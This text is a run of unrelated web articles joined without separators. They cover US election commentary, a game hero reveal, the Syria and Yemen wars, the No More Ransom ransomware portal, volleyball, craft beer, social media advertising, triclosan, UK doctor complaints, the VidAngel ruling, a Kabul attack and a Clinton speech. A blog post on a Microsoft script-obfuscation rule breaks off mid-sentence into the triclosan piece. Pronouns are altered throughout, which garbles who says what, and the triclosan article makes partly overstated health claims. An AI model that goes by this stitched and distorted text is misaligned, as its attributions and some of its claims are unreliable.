The election marked the collapse of the Democrats' electoral strategy of using the politics of gender, race and sexual preference—the obsession of privileged layers of the middle class—to conceal their agreement with the Republicans on ever more brutal attacks on the working class. The passage of a series of ballot measures to raise the minimum wage, including in states that elected Republicans to Congress and the state house, showed that the masses are moved by basic social and class issues, not the secondary issues that preoccupy the narrow and wealthy base of the Democratic Party.
The Democrats and their pseudo-left allies are proposing various alibis to explain the Democratic debacle, all of which, in one way or another, imply that the working class failed to turn out for the Democrats because it is stupid, racist or both.
Obama himself, in an interview broadcast Sunday on CBS News' “Face the Nation” program, said the people had somehow failed to appreciate the wonderful things they had done in their behalf. “I think we have not been successful,” they declared, “in going out there and letting people know what it is that we are trying to do and why this is the right direction.” Arrogance and lies! It is precisely because of the things the Obama administration has done—not “for,” but “to”—the vast majority of the people that they are so hated and despised.
The victory of the Republican Party is a distorted reflection of the leftward trajectory of millions of workers and youth and a growing awareness that the Democrats, no less than the Republicans, are a party of Wall Street. However, these sentiments, in a political and electoral system dominated by two right-wing parties of big business, could find mass expression only in the negative, i.e., through abstention.
The basic division is not between the Democrats and Republicans, but between a tiny financial oligarchy and the working class, the vast majority of the population. The working class is angry and disillusioned. It increasingly sees through the democratic façade and senses the futility of seeking to address its concerns through the existing political system. This means social opposition must and will develop in conflict with the entire political establishment and the social system, capitalism, it upholds.
Joseph Kishore
Please enable JavaScript to view the comments powered by Disqus.
What you should know about Kharazim and Infernal Shrine releases
Kharazim is finally revealed in all of their monkish glory, while Infernal Shrines offers a new take on map objectives; one that chases and kills enemy heroes.
There isn't much to type that can do a better job of explaining Kharazim than just watching the trailer for your self. Go do that. Finished? Here are some basics:
Their heroic abilities are Divine Palm and Seven-Sided strike. Divine palm is a support heroic that allows you to strike an ally and, if they are killed while the buff is on them, they get a huge heal. A literal lifesaver. Seven-Sided strike is the offensive heroic and causes Kharazim to teleport around, striking people 7 times.
Like many already know, you can build them either as a hard support or as a melee assassin of sorts.
Their E ability is called Deadly Reach, which extends their range and gives them extra damage on their attacks.
Their W ability is called Breath of Heaven and their themselves and allies all around him.
Their Q is a teleport called Radiant Dash that allows you to warp around the battlefield to friend or foe.
Their 3 traits are Iron Fists that gives bonus attack damage, Transcendence that heals themselves through melee combat, or Insight to restore mana.
​
The new battleground is just as exciting. Watch it, be amazed. Now read on:
The Punishers which can be summoned are designed to not only push, but aggressively hunt down enemy heroes. A circle appears around the enemy they are going to kill, and they can even jump over walls quickly to reach them. They just hunts down the enemy team.
There are three shrines and they each summon skeletons. The first team to kill 30 skeletons gets a Punisher summoned for them.
There are different types of Punishers. An Ice one using ice attacks, a Fire one using fire attacks, and an arcane type. Each one has different strengths and weaknesses.
More Gamescom goodness will be revealed on August 7 from 9:00 a.m. PDT (18:00 CEST) during the live streamed show at www.blizzgc.com this Friday for more on the new Heroes and Battlegrounds.
Follow us @gosugamersHotS for more eSports news
More on GosuGamers Heroes of the Storm:
Do you want to join our GosuGamers crew? Click here for more information
Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings.
Feb. 5, 2016, 8:56 AM GMT / Updated Feb. 5, 2016, 8:56 AM GMT By The Associated Press and Reuters
A Saudi military spokesperson said Thursday the kingdom is ready to send ground troops to Syria to fight ISIS — an offer welcomed by Defense Secretary Ash Carter.
Saudi Brig. Gen. Ahmed Asiri on Thursday told The Associated Press that Saudi Arabia has taken part in coalition airstrikes against ISIS since the U.S.-led campaign began in September 2014, but could now provide ground troops. The U.S. is scheduled to convene a meeting of defense ministers from countries fighting ISIS in Brussels next week month.
"We are determined to fight and defeat Daesh," Asiri said, using the pejorative Arabic term for ISIS. They didn't say how many troops the kingdom would send.
Related: Peace Talks Stall, but War Moves Quickly in Syria
Saudi Arabia is deeply involved in Yemen's civil war, where it is fighting Iranian-backed Shiite rebels. Saudi Arabia and other Gulf countries have long viewed Iran as a regional menace, and Riyadh and Tehran back opposite sides in the wars in Syria and Yemen.
Saudi military spokesperson Ahmed Asiri, right, talks to Saudi officials in Riyadh. Hasan Jamali / AP File
Secretary Carter later welcomed the Asiri's statement, saying that increased activity by other countries would make it easier for the U.S. to accelerate its fight against ISIS.
"That kind of news is very welcome," they told reporters while on a visit to Nellis Air Force Base in Nevada.
Related: Is U.S. Looking for a 'Settlement' With Syria's Assad
They said the Saudi government had indicated a willingness to do more in the fight against ISIS, which controls vast swaths of Syria and Iraq.
Also on Thursday, Russia and Turkey traded accusations on Syria, with the Kremlin saying it suspected Turkey was preparing a military incursion into Syria. Turkey in turn accused Moscow of trying to divert attention from its own "crimes" in Syria, and said the Syrian city of Aleppo was threatened with a "siege of starvation."
Iran and Russia back the regime of President Bashar Assad while Saudi Arabia, Turkey and the U.S., among others, oppose it.
A new tool containing 160.000+ keys will help victims to retrieve their data
Today, the Dutch National Police, Europol, Intel Security and Kaspersky Lab join forces to launch an initiative called No More Ransom, a new step in the cooperation between law enforcement and the private sector to fight ransomware together. No More Ransom(www.nomoreransom.org) is a new online portal aimed at informing the public about the dangers of ransomware and helping victims to recover their data without having to pay ransom to the cybercriminals.
Ransomware is a type of malware that locks the victims' computer or encrypts their data, demanding them to pay a ransom in order to regain control over the affected device or files. Ransomware is a top threat for EU law enforcement: almost two-thirds of EU Member States are conducting investigations into this form of malware attack. While the target is often individual users' devices, corporate and even government networks are affected as well. The number of victims is growing at an alarming rate: according to Kaspersky Lab, the number of users attacked by crypto-ransomware rose by 5.5 times, from 131 000 in 2014-2015 to 718 000 in 2015-2016.
NOMORERANSOM.ORG
The aim of the online portal www.nomoreransom.org is to provide a helpful online resource for victims of ransomware. Users can find information on what ransomware is, how it works and, most importantly, how to protect themselves. Awareness is key as there are no decryption tools for all existing types of malware available to this day. If you are infected, the chances are high that the data will be lost forever. Exercising a conscious internet use following a set of simple cybersecurity tips can help avoid the infection in the first place.
The project provides users with tools that may help them recover their data once it has been locked by criminals. In its initial stage, the portal contains four decryption tools for different types of malware, the latest developed in June 2016 for the Shade variant.
Shade is a ransomware-type Trojan that emerged in late 2014. The malware is spread via malicious websites and infected email attachments. After getting into the user's system, Shade encrypts files stored on the machine and creates a .txt file containing the ransom note and instructions from cybercriminals on what to do to get user's personal files back. Shade uses strong decryption algorithm for each encrypted file, with two random 256-bit AES keys generated: one is used to encrypt the file's contents, while the other is used to encrypt the file name.
Since 2014, Kaspersky Lab and Intel Security prevented more than 27 000 attempts to attack users with Shade Trojan. Most of the infections occurred in Russia, Ukraine, Germany, Austria and Kazakhstan. Shade activity was also registered in France, Czech Republic, Italy, and the US.
By working closely together and sharing information between different parties, the Shade command and control server used by criminals to store keys for decryption was seized, and the keys were shared with Kaspersky Lab and Intel Security. That helped to create a special tool which victims can download from the No More Ransom portal to retrieve their data without paying the criminals. The tool contains more than 160.000 keys.
PUBLIC – PRIVATE COOPERATION
The project has been envisioned as a non-commercial initiative aimed at bringing public and private institutions under the same umbrella. Due to the changing nature of ransomware, with cybercriminals developing new variants on a regular basis, this portal is open to new partners' cooperation.
Wilbert Paulissen, Director of the National Criminal Investigation Division of National Police of the Netherlands: "We, the Dutch police, cannot fight against cybercrime and ransomware in particular, alone. This is a joint responsibility of the police, the justice department, Europol, and ICT companies, and requires a joint effort. This is why I am very happy about the police's collaboration with Intel Security and Kaspersky Lab. Together we will do everything in our power to disturb criminals' money making schemes and return files to their rightful owners without the latter having to pay loads of money."
"The biggest problem with crypto-ransomware today is that when users have precious data locked down, they readily pay criminals to get it back. That boosts the underground economy, and we are facing an increase in the number of new players and the number of attacks as a result. We can only change the situation if we coordinate our efforts to fight against ransomware. The appearance of decryption tools is just the first step on this road. We expect this project to be extended, and soon there will be many more companies and law enforcement agencies from other countries and regions fighting ransomware together", says Jornt van der Wiel, Security Researcher at Global Research and Analysis Team, Kaspersky Lab.
"This initiative shows the value of public-private cooperation in taking serious action in the fight against cybercrime," says Raj Samani, EMEA CTO for Intel Security. "This collaboration goes beyond intelligence sharing, consumer education, and takedowns to actually help repair the damage inflicted upon victims. By restoring access to their systems, we empower users by showing them they can take action and avoid rewarding criminals with a ransom payment."
Wil van Gemert, Europol Deputy Director Operations, finally: "For a few years now ransomware has become a dominant concern for EU law enforcement. It is a problem affecting citizens and business alike, computers and mobile devices, with criminals developing more sophisticated techniques to cause the highest impact on the victim's data. Initiatives like the No More Ransom project shows that linking expertise and joining forces is the way to go in the successful fight against cybercrime. We expect to help many people to recover control over their files, while raising awareness and educating the population on how to maintain their devices clean from malware."
ALWAYS REPORT
Reporting ransomware to law enforcement is very important to help authorities get an overall clearer picture and thereby a greater capacity to mitigate the threat. The No More Ransom website offers to the victims the possibility to report a crime, directly connecting with Europol's overview of national reporting mechanisms.
If you have somehow become a victim of ransomware, we advise you not to pay the ransom. By making the payment you will be supporting the cybercriminals' business. Plus, there is no guarantee that paying the fine will give you back the access to the encrypted data.
Tips & advice to prevent ransomware from infecting your electronic devices
World champions Poland will host the 2016 FIVB Volleyball World League Finals
Lausanne, Switzerland, December 10, 2015 - A meeting of the FIVB Executive Committee in Lausanne today confirmed that Poland will host the 2016 FIVB Volleyball World League Finals, at a venue to be announced. The five-day Finals featuring the top six teams in the 2016 edition of the competition will take place from July 13 to 17.Twelve teams will play World League Group 1 next year, including the eight teams that took part in 2015 (Australia, Brazil, Iran, Italy, Poland, Russia, Serbia and USA), as well as 2015 World League champions France, who began the competition by winning Group 2, and three other teams promoted from Group 2: Argentina, Belgium and Bulgaria.As in previous Olympic years, the 2016 FIVB Volleyball World League will be a shortened version of the competition, to accommodate teams taking part in the Rio 2016 Olympic Games. The Intercontinental Round will adopt the same format as the FIVB Volleyball World Grand Prix Intercontinental Round in 2016 with three different venues hosting matches over each of the three weeks of play in Group 1. The Finals will follow in week four.With the Finals taking place in Poland and all the former winners of the competition back in action, the competition's climax in 2016 is sure to provide an exciting spectacle in the run-up to the Rio Olympics. Over half a million fans attended the 103 match in the record-breaking FIVB Volleyball Men's World Championship organised by Poland in 2014.The FIVB Volleyball World League Finals in Poland will take place one week after the FIVB Volleyball World Grand Prix Finals hosted by Bangkok, Thailand from July 6-10. In 2015, the World League Finals were held at the Maracanazinho in Rio de Janeiro, Brazil.
Even after the funeral hall massacre in Sanaa over the weekend, U.S. officials keep making excuses for the Saudi-led coalition:
The official said there was no evidence that the coalition had deliberately tried to hit civilians; rather, the official said, shortcomings in intelligence and targeting procedures were the most likely explanation.
These claims simply aren't credible. The funeral hall was obviously targeted because there were many high-level political and military officials present for the funeral being held there, and the coalition's forces attacked the location at least three times in a row to try to kill as many of them as possible. There could be no doubt about the presence of civilians, since the point of bombing the funeral was evidently to strike at the attendees. Even if the site had been struck by mistake, that wouldn't let the coalition off the hook for violating international law, but everything we know about the attack tells us that it was done on purpose with no regard for the civilians that would be hurt and killed as a result. When the administration is presented with a textbook example of a war crime, their officials shrug and try to deny the obvious. This fits a pattern of statements from U.S. officials that have tried to cover for the crimes that the Saudis and their allies have been committing.
Priyanka Motaparthy wrote about this last week:
According to the Post, US officials say that “errors of capability or competence, not of malice” led to repeated Saudi-led coalition strikes on civilian structures. But how do they know? There have been no serious investigations into allegedly unlawful attacks. Moreover, whether Saudi targeteers were malicious or simply poorly trained does not absolve the government of responsibility. Indiscriminate attacks that fail to distinguish between civilians and military objectives as well as those that cause disproportionate loss of civilian life or property are also illegal under the laws of war.
It would be bad enough if the Saudi-led coalition were hitting so many civilian targets out of incompetence or carelessness, but Saturday's massacre shows that things are much worse than that. The funeral hall bombing is just the most egregious example of the coalition's attacks on civilian targets, and it is one that we can safely assume was not an accident.
When a friend of 16-year-old Norwegian Lars Andreas Bjercke got a text message that read “Jlv In ø a0ab 34348tu åaugjoi zølbmosdji jsøg ijio sjiw,” they wondered why their pal would send such a random assortment of characters. Little did they know that the message was written by the fox that had stolen Bjercke's cell phone. What was the fox trying to say? It might have been bragging about snatching the cell phone, or maybe asking for some delicious rabbits. Foxes love rabbits.
To attract a fox, Bjercke had installed an app on their phone that imitated the sounds rabbits make. We don't know why they were trying to attract a fox, but we're guessing it's because they are so adorable.
After a few nights of seeing the fox circle their yard, Bjercke put the phone down and walked away. Lured by the sound of rabbits, the fox approached the phone tentatively at first, but soon grabbed the phone and made a run for it.
Bjercke tried to chase the critter, but because it was a fox, it got away. That's kind of their thing. Having lost the fox, and their phone, Bjercke tried calling their own number in order to follow the ringing. That didn't work because when Bjercke called their phone, the fox answered. They could hear some crackling and noises, but the fox refused to give up its location.
Later, one of Bjercke's friends received the cryptic text message “Jlv In ø a0ab 34348tu åaugjoi zølbmosdji jsøg ijio sjiw.” We tried running it through Google Translate, but there's not Fox to English option, but our best guess is that it says “You up?”
The absolute best part about this story? It was caught on video. Adorable, adorable video.
(via LiveLeak, image via Loz Flowers)
Relevant to your interests
There hasn't been enough content depicting Wales on the corporations' UK-wide channels, according to BBC Wales' Head of Content.
Although many BBC programmes were made in Wales, such as Dr Who and Casualty, Welsh life was very seldom depicted in them, they said.
They added that the BBC had a duty to present the history of Wales to the people of the country, but also to a UK-wide audience.
Sian Gwynedd was speaking at an event organised by Cardiff University at the National Eisteddfod today.
Presenter Angharad Mair, who was also on the panel, said that there was a tendency to present the Welsh people like “monkeys in a zoo” on programmes presented by outsiders.
“Not only are we not depicted enough, but I'm also disappointed with the way we're depicted,” they said.
“We don't complain enough,” they added, noting that the BBC went to greater lengths to placate their audience in Scotland.
Not fielding presenters who had an intimate understanding of Welsh culture betrayed a lack of confidence in ourselves, they said.
Sian Gwynedd said that there had recently been an increase in the use of Welsh presenters, such as Nigel Owens, fronting UK-wide programmes.
In a country where more than 90% of the population is Catholic — Pope John Paul II was born there — it's a big deal when an atheist group puts up a billboard.
Forget one billboard, though. The Polish Association of Rationalists and a few other groups have put up two.
The first one features three boxes, each of which is checked off. They translate to “Do Not Kill,” “Do Not Steal,” and — the kicker — “Do Not Believe”:
The second pays homage to an American design used by the United Coalition of Reason and says, “Don't believe in God? You are not alone.”
“In a country considered to be Catholic, it's very hard to be an atheist,” said Jacek Tabisz, president of the Polish Association of Rationalists, one of the organisations responsible for the boards. “Contrary to popular belief, however, there are many of us although not all of us have let our beliefs be known. “The billboard action is not aimed at believers,” they added. “It is to show people that in a country where the stereotypical Pole is a Catholic there is a large group of atheists.”
Despite the natural opposition to the idea that you can be good without God, there's been no vandalism to either of the billboards… yet.
Wait, what? That's... that's AWESOME!
Okay. This came through on our FanShots, and, um... wow. It's a video of some South Korean pop dance band. We don't really know who they are or how popular they are, but the fact that the video has 700,000 views in two days is probably a decent indication that we're dealing with a popular group.
As "SFW" conventions go, it's totally safe and innocuous, but, y'know, it's nine young Korean girls dancing around in typical pop star outfits. IT wouldn't be irate, but a wandering supervisor might not be impressed. Really, you watch this type of thing at work at your own peril. So if you're willing to watch, this is "Oh!" by Girls' Generation (we don't know either); more importantly, go ahead and skip to 0:28, which is where the awesome starts.
Good lord. That makes Dance Dance Revolution look like Rock Band: Simon and Garfunkel. Now I have a headache. Anyway, yes, that's a Korean girl band who are taking turns adoring a Hawkeye helmet. It's in like 10 different shots. And no, we have no clue why. Absolutely no idea. What we do have, on the other hand, is plenty more pertinent screencaps of the International Tigerhawk Adventure after the jump.
So how about that? Our quarterback may love America, but South Korea's young popstar ladies love our Hawkeyes. It's like a love triangle, except not at all.
Speaking of which, we're aware that this video satisfies many, many sexual proclivities. We're not dumb. Still, do us all a favor and please refrain from telling us how it applies to your preferences in the comments. No, seriously. We don't want to know at all. Don't make this weird and uncomfortable. You know what'll help? Just... just pretend this is your marriage and keep your desires to yourself.
(Terrorist fist jab to King Video Ninja HFMR for the screencaps, and very terrorist fist jabs to fanposter Shooter McGavin. You're doing the Lord's work, sons.)
"Folks, when they come to a brewery, they want to meet the brewers," Katrivanos says. "And they want to connect with what they're drinking."
Another big thing is, of course, flavor.
Regulars Don Ripper and their friend Chana Morrow, who show up about once a week, are here for a tasting this evening.
"Really good balance," Ripper says as they sip a golden IPA called Folded Note.
Morrow has a darker brew, called Origins Unknown. "Nutty, malty," they say, as they savor.
A desire for beers that have more taste is, not surprisingly, a big part of what's driving the demand for craft beer. Just ask New District regular James Miervaldis — they say they love the variety here and "how they experiment."
Do they ever drink Bud or Miller? "Oh, God no — never, never, never."
So, fueled by the unquenchable thirst of its customers for the next great flavor note, the craft beer industry has exploded like a poorly fermented bottle of home brew. Now 1 in every 8 beers sold in the U.S. is craft beer, and more than 20 percent of the money consumers spend on beer goes to independent and small brewers.
Flying Dog Brewery in Frederick, Md., was founded in the 1990s. But CEO Jim Caruso says there's been an even bigger boom since 2008, with a growth rate that's pushed the number of craft breweries to more than 4,000. Meanwhile, Caruso says, beer titans like Budweiser, Miller and Coors have seen sales trend down.
So the giant brewers have taken action. Anheuser-Busch has bought up a number of craft breweries, including Seattle's Elysian Brewing and Chicago's Goose Island, and Constellation Brands just paid $1 billion for Ballast Point, a San Diego craft brewer.
These developments, Caruso says, are persuading some people to start brewing because it's the next "get rich quick" scheme. And that's led to some newcomers "putting out some bad beer," they say.
They worry that if consumers get a few bottles of beer that's not good, they may get turned off the industry. "It may be months or years before they come back and try it again," they say.
But say you're confident in your brewing skills: Is there still time for you to get into the business?
Probably, says Bart Watson, an economist for the Brewers Association. New brewery openings outnumber closings nearly 10 to 1, Watson says. And the industry, which adds around $55 billion a year to the U.S. economy, now helps support 424,000 jobs.
But some parts of the country have become pretty crowded — perhaps overcrowded — with new breweries, Watson says. San Diego County, Calif., has more than 110 breweries, and Portland, Ore., has 60, just in the city proper. "Those places are really pushing the limit," they say.
The craft beer movement largely started in the West, Watson notes, and is now moving eastward. That's partly because state regulation of alcohol was strongest in the East after Prohibition and has been loosened more slowly. So, Watson says, in the East and the Southeast, there's lots more room for craft beer to grow.
And Watson offers another statistic that should ease concerns about a brewery bubble forming: There are about 8,000 wineries in the United States, and, they say, "Americans drink a lot more beer than they drink wine." So, they say, as long as many of them are small, and locally focused — "like a local restaurant" — they think there are plenty of opportunities and market niches where small brewers can thrive.
So go ahead, start your own brewery. Just expect to come up with an initial investment of around $500,000, and don't expect to get rich, says New District's Katrivanos.  They are hanging on to their engineering job at the Pentagon until their brewery can pay them a salary. "If you're getting into brewing specifically to make money, I'd advise against it," they say. If that's your goal, they say, "You should go start a tech company."
What's the point in an advertising campaign if it doesn't boost your return on investment (ROI)? After all, you put in $1,000 towards a marketing campaign, but in the end you only get an extra $500 in revenue and no guarantees of return or loyal customers. That's basically $500 wasted (and much more if you account for time and labor). Social media can be a great platform for advertising, but only if you can optimize your ROI.
First, keep in mind that “advertising” can take on many different meanings. Sometimes the more organic routes are much more effective than traditional approaches. Here are seven ways to use social media advertising and maximizing the odds of a high ROI.
1. Twitter + Images = Gold
People like images, even when there's such a short character count that reading is a breeze. However, many companies have reported that using images on Twitter leads to a 150 percent increase in retweets. It's easier to retweet and share images without having the leave Twitter, which basically cuts the middle man out of Twitter advertising.
2. Use Google Authorship
Google Authorship is there—use it. If you have a writer and advertiser who's built a following, make sure any advertising campaigns are linked to their Google+ profile. While there's little evidence that Authorship “works,” it's certainly worth a shot and requires minimal extra efforts.
3. Don't offer what you can't afford
“Advertising” on social media can sometimes take the form of extreme discounts and giveaways. In certain instances this can work, such as requiring consumers to buy a cheap product for the chance to win a bigger one. Do your homework, though, and make sure even the worst case scenario will be in your favor financially.
4. Meet “in person”
With Tweetup or another social media-induced video tool, take the time to go a little deeper with your strongest markets or partners. That face to face connection can work wonders, and you'll stand out among the crowd. However, don't get sucked into wasting your time. Reserve video sessions for the big dogs like investors or potentially huge clients.
5. Combine your efforts
If you have five business social media pages, first make sure they're all relevant to you and then make sure they play nicely together. This means no duplicate content, linking to one another and building your own empire that's interwoven, not mixed and matched together.
6. Consider Outsourcing to the experts
Sometimes it makes sense to outsource to the experts. If you are not have the resources, or are having difficult getting ROI find a strategic partner makes sense. Whether it is using Hootsuite to schedule Tweets, Radion6 for listening or AdParlor for campaign optimization, finding the right partner can be helpful.
7. Be careful when going native
Native advertising is when an advertising campaign is camouflaged to look like organic content. For example, an article on Buzzfeed might be “sponsored” by an insurance company. Consumers don't want to feel tricked, but they also want to be entertained and have their advertising mesh with the site they're on. With social media, you're in charge of being equal parts entertainer, informer and just a dash advertiser. That can be a tough fence to sit upon.
8. Just ask
Advertising is no longer a platform on which to lecture, but a means of engaging your audience. Ask open ended questions as part of your campaign, truly welcome feedback, and never drop the ball.
Most importantly, if an ad campaign isn't working, change it. Nobody has money to waste on a campaign that isn't performing. At Cannes Lions this year, Ben Legg, CEO of Adknowledge, spoke to a packed room of marketers and advertisers about how to calculate customer lifetime value. Legg said “Understanding the ROI of your social media spend will shine a light on a traditional marketing blind spot, calculating the link between marketing spend vs customer acquisition, engagement, retention and value. They asked the question: What are the barriers to prevent you calculating the LTV of your customers, because if you do not start doing it now your competitors will crush you”.
On this blog post I will cover my testing of the Attack Surface Reduction rule for Potentially Obfuscated Scripts. This is one of the features that intrigued me the most. One obfuscates the scripts for several reasons:
Bypass detection controls like AV, automatic log analysis and other controls.
Hinder analysis of the script to determine its purpose and action.
On the offense side it is a requirement given how more tools are improving their detection the obfuscation allows bypassing them but also has the drawback of bringing attention to the code since it will look out of place. By detecting obfuscation and blocking its execution it would impact the capabilities of some actors limiting the tool-set they can use.
Microsoft describes the rule as follows in their documentation:
Check your toothpaste, check your hand wash, soap, shampoos and deodorants, if you see this ingredient: ‘TRICLOSAN' throw it away!
Triclosan is a commonly used antimicrobial agent that is used in many personal beauty products. While it is banned in Europe, Japan and restricted in Canada, the chemical has been around in the US for more than 40 years lurking in everything from hand soaps, cosmetics, deodorants and toothpastes.
Triclosan has the ability to accumulate in the body in fatty tissues and has been linked to hormone disruption, allergies and other endocrine disorders. It is also responsible for creating bacteria resistant to antibiotics.
A study conducted in 2009 found that triclosan decreased thyroid hormone concentrations and enhanced the expression of androgen and estrogen sensitive genes.
A further study in 2000, found that many bacterias were resistant to triclosan, creating controversy on its believed anti-bacterial properties. This was followed up by another study in 2010 by the European Commission's Scientific Committee on Consumer Safety which found that low concentrations of triclosan can “trigger antibiotic resistance in bacteria.”
In a sample study conducted by the Centers for Disease Prevention and Control, 75 percent of people tested had triclosan in their urine and three out of five human milk samples also contained the chemical. Levels of triclosan were also found in umbilical cord blood.
After years of consumer pressure the FDA have looked into tricoslan and have found no evidence that triclosan is antibacterial. Despite this evidence, they have failed to issue it's removal from consumer products.
“New data suggest that the risks associated with long-term, daily use of antibacterial soaps may outweigh the benefits,” states Colleen Rogers, a lead microbiologist at the FDA.
Triclosan also negatively impacts the environment and traces of it, which are highly toxic to aquatic life, have been found in rivers and lakes.
Identifying triclosan is easy, just read the ingredient list on your personal beauty products and anti-bacterial soaps.
If you are looking for anti-bacterial protection try natural essential oils like tea tree, peppermint, eucalyptus, rosemary or lavender.
Apple Cider Vinegar also makes an excellent antibacterial and anti-fungal cleaning product or sanitizer, just dilute in water and add lavender essential oil for a nice smell.
Image caption The rise in complaints by 23% continues a trend seen in recent years
The number of complaints in the UK made to the General Medical Council about doctors has risen 23% in the past year, the regulator says.
The GMC report showed there were 8,781 in 2011 compared to 7,153 in 2010.
The rise is similar to the one the year before and continues a trend which has seen complaints jump by 69% in three years.
But the regulator said there was no evidence to suggest care was getting worse.
Instead, it claimed the rise was down to greater expectations and willingness to complain.
The figures - the most detailed yet to be released by the GMC - showed that not all the complaints led to full-scale investigations.
Nearly 5,000 were closed after an initial assessment, while another 1,537 were deemed not to impair a doctor's ability to practise medicine.
'Better understanding'
In total, 2,330 were investigated fully - a rise of 13% since 2010.
There are 245,903 doctors on the medical register
In 2011 8,781 complaints were made about their conduct
That is up from 7,153 the year before, a rise of 23%
Not all of the complaints led to full-scale investigations
In fact, nearly 5,000 were closed after an initial assessment
But another 2,330 led to a serious investigation, up by 13% on the previous year
Action was taken in more than 500 cases, although just 65 doctors were struck off from the register
The allegations that were most often involved in such cases included poor treatment, financial deception, false reporting and fraud
Only 158 of these have led to doctors being suspended or struck from the medical register with many more ending in warnings or advice being issued.
GPs, psychiatrists and surgeons attracted the highest rates of complaints, while men, and in particular older male doctors, were far more likely to be the subject of complaints than women.
The most complained about topic was the care and treatment given, followed by communication and respect for patients, which both saw large rises in the past year.
But the GMC said there was no evidence care was getting worse, pointing out other professions were seeing a rise in complaints too.
Niall Dickson, chief executive of the GMC, added: "While we do need to develop a better understanding of why complaints to us are rising, we do not believe it reflects falling standards of medical practice.
"Every day there are millions of interactions between doctors and patients and all the evidence suggests that public trust and confidence in the UK's doctors remains extremely high."
They also said the GMC was introducing a number of measures in response to the rise in complaints.
These include a confidential helpline for doctors to report their own concerns, a national induction programme for new doctors and a 15-strong team of employer liaison advisers to develop a closer relationship between the GMC and senior officers responsible for dealing with complaints locally.
Of particular concern is the huge rise in complaints in relation to communication and lack of respect Katherine Murphy, Patients Association
Particular concern
Health minister Dr Dan Poulter said it was right that the GMC took steps to better understand what was behind the rise in complaints, but agreed it did not necessarily mean medical standards were falling.
Their sentiments were echoed by British Medical Association chairperson Dr Mark Porter.
They said: "It is a good thing that patients feel more empowered to raise their concerns."
But Katherine Murphy, chief executive of the Patients Association, said they felt the figures did raise questions about quality of care: "Of particular concern is the huge rise in complaints in relation to communication and lack of respect. Patients have the right to be well informed, treated with dignity and part of shared decisions about their treatment.
"However, evidence from our helpline supports this report in making clear that for too many patients this is simply not happening. Patients often tell our helpline they are not receiving the compassion, dignity and respect which they deserve and are entitled to under the NHS constitution."
SALT LAKE CITY — A federal judge granted a preliminary injunction against video streaming service VidAngel on Monday.
For families and individuals hungry for a way to edit or filter some of their favorite films, VidAngel came to the rescue. However, some say this company has a tragic flaw.
In recent months, four major Hollywood Studios said VidAngel — no matter how beloved — is breaking the law.
And on Monday, Judge Andre Birotte Jr., of the Central District Court of California, sided with the studios.
"Injunctive relief is 'an extraordinary remedy that may only be issued upon a clear showing that plaintiff is entitled to such relief,'" Birotte said in Monday's ruling, citing an earlier precedent.
"VidAngel argues that the public interest in protecting every person's right to watch filtered content in private would be severely undercut by the issuance of a preliminary injunction. This argument strongly relies on VidAngel's characterization of its service as the only filtering service under the (Family Movie Act) that supports streaming digital content to mobile devices, tablets and Smart TVs," they continued.
However, Birotte pointed to a similar company, ClearPlay, that offers authorized streaming through GooglePlay's service.
"On the other hand, it is virtually axiomatic that the public interest can only be served by upholding copyright protections and correspondingly, preventing the misappropriation of skills, creative energies, and resources which are invested in the protected work," they said, quoting an earlier ruling. "Accordingly, the court concludes that a preliminary injunction is in the public interest."
Neal Harmon, CEO of VidAngel, issued the following statement:
“Hollywood studios have followed a repeated pattern in their decades-long campaign to put movie filtering services out of business by seeking a shut-down decision in trial court. Previously, such a decision has signaled the end of the legal battle. As such, while we are extremely disappointed for the countless people who rely on our service regularly to enjoy movies using filters, our customers have given us not just the mandate to fight this battle all the way to the Supreme Court, but the financial resources as well. We will aggressively pursue an appeal and take this case to a higher level where we have always believed we will ultimately prevail.”
This article will be updated with additional information.
2016-12-12 Order Granting Preliminary Injunction by KSLcom on Scribd
Seven Killed At American University Campus In Kabul
Seven Killed At American University Campus In Kabul
A wounded man is treated in an ambulance outside the campus
At least seven people have been killed after gunmen attacked the American University of Afghanistan in Kabul.
Security forces were alerted to the campus after students tweeted reports of gunfire and explosions and begged for help.
One wrote: "#AUAF under attack. I along with my friends escaped and several others of my friends and professors trapped inside."
A senior police officer told AP a further 30 were wounded before Afghan security forces killed two gunmen.
Police said the attack began at around 6.30pm local time (3pm UK time) on Wednesday with a large explosion that officials later said was a car bomb.
Image: The entrance of the Saleha Bayat Building at the American University of Afghanistan in Kabul (library pic: Creative Commons)
It was followed by gunfire, as suspected militants burst into the complex where foreign staff were working and pupils were studying.
Nearly ten hours after the initial blast, Fraidoon Obaidi, chief of Kabul police's Criminal Investigation Department, said: "We have ended our clean-up operation. Two attackers were gunned down."
Some students jumped from second floor windows to escape the attackers, witnesses and officials said.
"Many students jumped from the second floor, some broke their legs and some hurt their head trying to escape," said Abdullah Fahimi, a student who escaped.
Image: An Afghan police officer stands outside the campus
They injured their ankle making the leap.
"We were in the class when we heard a loud explosion followed by gunfire. It was very close. Some students were crying, others were screaming," they added.
No foreigners have been reported among the wounded.
No one has claimed responsibility for the attack which comes two weeks after two university staff members were kidnapped from their car by unknown gunmen.
Their whereabouts are still unknown.
Islamist militant groups, mainly the Afghan Taliban and a local offshoot of Islamic State, have claimed a string of atrocities.
They are aimed at destabilising the country and toppling the Western-backed government of President Ashraf Ghani.
In first public appearance after Trump victory, Hillary Clinton says America is worth fighting for, as Bernie Sanders calls for Democrats to leave center ground
Clinton: 'There have been times when I wanted never to leave the house again'
Hillary Clinton has made their first public appearance since conceding the election to Donald Trump a week ago, challenging supporters to continue the fight for a country that is “hopeful, inclusive and big-hearted”.
“I will admit coming here tonight wasn't the easiest thing for me,” Clinton told the audience in Washington on Wednesday night. “There have been a few times this past week when all I've wanted to do was just to curl up with a good book or our dogs and never leave the house ever again.”
Donald Trump renews war with media as transition chaos continues Read more
Clinton was scheduled to appear at the event – a gala for the Children's Defense Fund, where they began their career more than four decades ago – before their stunning defeat. The organization's founder, Marian Wright Edelman, a longtime friend, introduced Clinton to the predominantly female audience as “the people's president”, noting that they were leading the popular vote by more than 1 million votes.
“I know that over the past week a lot of people have asked themselves whether America is the country we thought it was,” Clinton said. “The divisions laid bare by this election run deep. But, please, listen to me when I say this: America is worth it. Our children are worth it. Believe in our country and fight for our values and never, ever give up.
“The words of Dr King, often repeated by President Obama: ‘The arc of the moral universe is long but it bends toward justice.' I know sometimes it can feel awfully long – believe me, I know. But I also know it does bend.”
Clinton chose to honor the commitment to address the gala, an aide said, describing the event as a “homecoming”. In 1969, as a first-year law student, Clinton heard Edelman speak at Yale University and approached them to inquire about an internship. Edelman said the organization had no money to hire her, but if they could find a way, they were welcome.
